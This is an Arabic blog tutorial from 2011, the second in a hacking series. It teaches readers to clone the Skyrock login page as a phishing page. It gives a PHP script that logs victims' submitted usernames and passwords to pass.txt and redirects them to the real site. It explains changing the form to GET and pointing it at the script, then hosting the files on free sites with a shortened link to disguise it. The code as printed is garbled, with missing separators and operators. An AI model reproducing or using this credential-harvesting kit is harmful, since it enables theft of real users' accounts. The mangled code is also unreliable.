mardi 8 novembre 2011

الحلقة 2 : الاختراق بالصفحات المزورة

في هذا الدرس سأشرح طريقة صناعة أي صفحة دخول مزورة  و هي صفحة مكونة من جزئين ( صفحتين ) . الجزأ الأول مخصص لدخول الضحية و الجزأ الثاني هو الذي تجد فيه الباسوورد و اسم الدخول.

أنا سأطبق على صفحة السكاي روك
باسم الله


ثم قم بحفظ الصفحة في جهازك


1- ندخل الى الصفحة التي نريد تزويرها :) skyrock

2-
احفظ هذا الكود عندك بامتداد php و سمه بأي اسم و ليكن help.php

كود PHP:
<?php
$handle 
fopen("pass.txt""a");
foreach(
$_GET as $variable => $value) { fwrite($handle$variable); fwrite($handle"="); fwrite($handle$value); fwrite($handle"\r\n");$redirect "هنا ضع رابط الصفحة الحقيقي";header("Location:$redirect ");
fwrite($handle"\r\n"); fclose($handle);
exit; 
?>
- قم بأنشاء ملف texte و سمه pass.txt

4- الان اذهب الى الصفحة التي قمت بحفطها و افتحها ب ال bloc-note ثم اضغط F3 ستفتح نافذة البحث و ابحث عن كلمة action اللتي تكون مسبوقة بالمتغير post كما في الصورة



5- الان قم بتغيير كلمة post الى كلمة get و غير الرابط الموجود أمام كلمة action الى اسم ملف الكود الذي حفظته سابقا help.php لتصبح كما في الصورة




ثم احفظ الصفحة مع التغيير

الان أصبح عندك ثلاث ملفات : الصفحة المزورة و ملف الكود و ملف text , قم برفعها على أي موقع استضافة مثل
Welcome to Ripway.com - free file hosting, free music hosting, direct linking أو Most Endorsed FREE Website Hosting Provider | Free Website Hosting







لا تنسى عمل اختصار لرابط الصفحة المزورة في  
Dot TK - Renaming The Internet 
أو أي موقع اخر و الباقي عليك
كما أن هناك مواقع تمكنك من صنع صفحتك مجانا 
ICI
ICI
ICI

 الى الحلقة القادمة
(: ..........انتهى الدرس










0 commentaires:

Enregistrer un commentaire

شاركـــــــنا أفكـــــــارك و آراءك